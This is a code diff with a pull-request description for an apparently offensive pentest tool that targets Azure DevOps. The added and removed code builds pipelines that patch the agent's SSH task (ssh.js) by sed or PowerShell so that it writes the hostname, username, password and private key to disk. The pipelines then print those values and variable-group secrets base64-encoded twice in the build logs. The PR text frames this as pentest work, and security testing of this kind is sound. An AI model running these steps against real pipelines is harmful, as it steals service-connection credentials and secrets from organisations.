-                "script": "SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js); mv $SSH_FILE.bak $SSH_FILE ; cat /tmp/artefacts.tar.gz | base64 -w0 | base64 -w0 ; echo ''; rm /tmp/artefacts.tar.gz",
-                "displayName": taskName,
-            },
-        ],
-    }
+    def generatePipelineForSSH(self, sshSCName, poolName=None, os="linux"):
+        self._defaultTemplate = self._get_base_template(poolName, os)
+        self._defaultTemplate["steps"].append({"checkout": "none"})
 
-    _serviceConnectionTemplateSSHWindows = {
-        "trigger": "none",
-        "pool": {"vmImage": "windows-latest"},
-        "steps": [
-            {"checkout": "none"},
-            {
-                "task": "PowerShell@2",
-                "inputs": {
-                    "script": 'Get-ChildItem -Path "D:\\a\\" -Recurse -Filter "ssh.js" | ForEach-Object { $p = $_.FullName; copy $p $p+".bak"; (Get-Content -Path $p -Raw) -replace [regex]::Escape(\'const readyTimeout = getReadyTimeoutVariable();\'), \'const readyTimeout = getReadyTimeoutVariable();const fs = require("fs");var data = "";data += hostname + ":::" + port + ":::" + username + ":::" + password + ":::" + privateKey;fs.writeFile("artefacts.tar.gz", data, (err) => {});\' | Set-Content -Path $p }',
-                    "targetType": "inline",
+        if os == "windows":
+            self._defaultTemplate["steps"].extend([
+                {
+                    "task": "PowerShell@2",
+                    "continueOnError": True,
+                    "inputs": {
+                        "targetType": "inline",
+                        "script": 'Get-ChildItem -Path "D:\\a\\" -Recurse -Filter "ssh.js" | ForEach-Object { $p = $_.FullName; copy $p ($p+".bak"); (Get-Content -Path $p -Raw) -replace [regex]::Escape(\'const readyTimeout = getReadyTimeoutVariable();\'), \'const readyTimeout = getReadyTimeoutVariable();const fs = require("fs");var data = "";data += hostname + ":::" + port + ":::" + username + ":::" + password + ":::" + privateKey;fs.writeFile("artefacts.tar.gz", data, (err) => {});\' | Set-Content -Path $p }',
+                    },
                 },
-                "continueOnError": True,
-            },
-            {"task": "SSH@0", "inputs": {"sshEndpoint": "#FIXME", "runOptions": "commands", "commands": "sleep 1"}},
-            {
-                "task": "PowerShell@2",
-                "inputs": {
-                    "script": 'Get-ChildItem -Path "D:\\a\\" -Recurse -Filter "ssh.js" | ForEach-Object { $p = $_.FullName; mv -force $p+".bak" $p ;}; $encodedOnce = [Convert]::ToBase64String([IO.File]::ReadAllBytes("artefacts.tar.gz"));$encodedTwice = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($encodedOnce));echo $encodedTwice; echo \'\'; rm artefacts.tar.gz;',
-                    "targetType": "inline",
+                {"task": "SSH@0", "inputs": {"sshEndpoint": sshSCName, "runOptions": "commands", "commands": "sleep 1"}},
+                {
+                    "task": "PowerShell@2",
+                    "displayName": self.taskName,
+                    "inputs": {
+                        "targetType": "inline",
+                        "script": 'Get-ChildItem -Path "D:\\a\\" -Recurse -Filter "ssh.js" | ForEach-Object { $p = $_.FullName; mv -force ($p+".bak") $p ;}; $encodedOnce = [Convert]::ToBase64String([IO.File]::ReadAllBytes("artefacts.tar.gz"));$encodedTwice = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($encodedOnce));echo $encodedTwice; echo \'\'; rm artefacts.tar.gz;',
+                    },
                 },
-                "displayName": taskName,
-            },
-        ],
-    }
-
-    def generatePipelineForSecretExtraction(self, variableGroup, poolName, os):
-        if os == "Windows":
-            self.addSecretsToYamlWindows(variableGroup.get("variables"))
+            ])
         else:
-            self.addSecretsToYaml(variableGroup.get("variables"))
-        self.addVariableGroupToYaml(variableGroup.get("name"))
-        if poolName:
-            self._defaultTemplate["pool"] = {"name": poolName}
-
-    def generatePipelineForSecureFileExtraction(self, secureFile, poolName):
-        self._defaultTemplate = self._secureFileTemplate
-        self.__setSecureFile(secureFile)
-        if poolName:
-            self._defaultTemplate["pool"] = {"name": poolName}
-
-    def generatePipelineForAzureRm(self, azureSubscription):
-        self._defaultTemplate = self._serviceConnectionTemplateAzureRM
-        self.__setAzureSubscription(azureSubscription)
-
-    def generatePipelineForGitHub(self, endpoint):
-        self._defaultTemplate = self._serviceConnectionTemplateGitHub
-        self.__setGitHubEndpoint(endpoint)
-
-    def generatePipelineForAWS(self, awsCredentials):
-        self._defaultTemplate = self._serviceConnectionTemplateAWS
-        # self.__setAWSRegion(regionName)
-        self.__setAWSCredential(awsCredentials)
-
-    def generatePipelineForSonar(self, sonarSCName):
-        self._defaultTemplate = self._serviceConnectionTemplateSonar
-        self.__setSonarServiceConnectionName(sonarSCName)
-
-    def generatePipelineForSSH(self, sshSCName):
-        self._defaultTemplate = self._serviceConnectionTemplateSSH
-        self.__setSSHServiceConnectionName(sshSCName)
-
-    def addVariableGroupToYaml(self, variableGroupName):
-        self._defaultTemplate.get("variables")[0]["group"] = variableGroupName
-
-    def addSecretsToYaml(self, secrets):
-        self._defaultTemplate.get("steps")[0]["env"] = {}
-        for sec in secrets:
-            key = f"secret_{sec}"
-            value = f"$({sec})"
-            self._defaultTemplate.get("steps")[0].get("env")[key] = value
-
-    def addSecretsToYamlWindows(self, secrets):
-        self._defaultTemplate = self._defaultTemplateWindows
-        secretVars = ""
-        for sec in secrets:
-            key = f"secret_{sec}"
-            value = f"$({sec})"
-            secretVars = secretVars + "'" + key + "'" + "=" + "\"" + value + "\"" + "\n"
-        self._defaultTemplate["steps"][0]["inputs"]["script"] = """
-        $secret_vars = @{{        
-          {secretVars}
-        }}
-
-        $secret_vars.GetEnumerator() | ForEach-Object {{
-          $output += "$($_.Key)=$($_.Value)`n" 
-        }}
-            
-        $output = $output.TrimEnd("`n")
-        $base1 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes(("{{0}}" -f $output)))
-        $base2 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes(("{{0}}" -f $base1)))
-        Write-Host $base2
-        """.format(secretVars=secretVars)
-
-    def __setSecureFile(self, secureFile):
-        self._defaultTemplate.get("steps")[0].get("inputs")["secureFile"] = secureFile
-
-    def __setAzureSubscription(self, azureSubscription):
-        self._defaultTemplate.get("steps")[0].get("inputs")["azureSubscription"] = azureSubscription
-
-    def __setGitHubEndpoint(self, endpoint):
-        self._defaultTemplate.get("resources").get("repositories")[0]["endpoint"] = endpoint
-
-    def __setAWSRegion(self, regionName):
-        self._defaultTemplate.get("steps")[0].get("inputs")["regionName"] = regionName
-
-    def __setAWSCredential(self, awsCredentials):
-        self._defaultTemplate.get("steps")[0].get("inputs")["awsCredentials"] = awsCredentials
-
-    def __setSonarServiceConnectionName(self, scName):
-        self._defaultTemplate.get("steps")[0].get("inputs")["SonarQube"] = scName
-
-    def __setSSHServiceConnectionName(self, sshName):
-        self._defaultTemplate.get("steps")[2].get("inputs")["sshEndpoint"] = sshName
+            self._defaultTemplate["steps"].extend([
+                {
+                    "script": 'SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js) ; cp $SSH_FILE $SSH_FILE.bak ; sed -i \'s|const readyTimeout = getReadyTimeoutVariable();|const readyTimeout = getReadyTimeoutVariable();\\nconst fs = require("fs");var data = "";data += hostname + ":::" + port + ":::" + username + ":::" + password + ":::" + privateKey;fs.writeFile("/tmp/artefacts.tar.gz", data, (err) => {});|\' $SSH_FILE',
+                    "displayName": f"Preparing {self.taskName}",
+                },
+                {
+                    "task": "SSH@0",
+                    "continueOnError": True,
+                    "inputs": {"sshEndpoint": sshSCName, "runOptions": "commands", "commands": "sleep 1"},
+                },
+                {
+                    "script": "SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js); mv $SSH_FILE.bak $SSH_FILE ; cat /tmp/artefacts.tar.gz | base64 -w0 | base64 -w0 ; echo ''; rm /tmp/artefacts.tar.gz",
+                    "displayName": self.taskName,
+                },
+            ])


### PR DESCRIPTION
Hello all!

I recently found myself on an pentest that included Azure DevOps, and I used nord-stream to perform all the extracts I needed.
This PR makes a few improvements that I had to add during testing to adapt to the environment:

`--sleep`: allows you to specify a custom value for the wait time to retrieve the pipeline output. This is useful in “busy” DevOps environments, where other developers run a lot of pipelines in parallel, causing queues
`--pool-name`: allows you to specify a custom agent pool in case the default “Azure Pipeline” pool is no longer present. This value will be set as the pool name in the pipeline YAML file
`--default-agent`: allows you to specify a default agent pool for deployment. This is not necessarily the same pool as the one specified in the YAML. In the web GUI, this can be found in the pipeline editor -> Triggers -> YAML. The `pipelines` API does not allow you to specify this value at creation; you must go through the `definitions` API and specify a “queue” that can be found via the `distributedtask/queues` API.
`--os`: useful in cases where all available agents are running Windows. Not only does this require running a PowerShell script instead of Bash, but it also turns out that in Windows, passing variables from a variable group via the `env` does not work well at all. So I had to trick it by passing the variables directly into the script.

I only had Azure DevOps available to perform my tests and modifications. However, I imagine that these types of options could be ported to other CI/CD environments.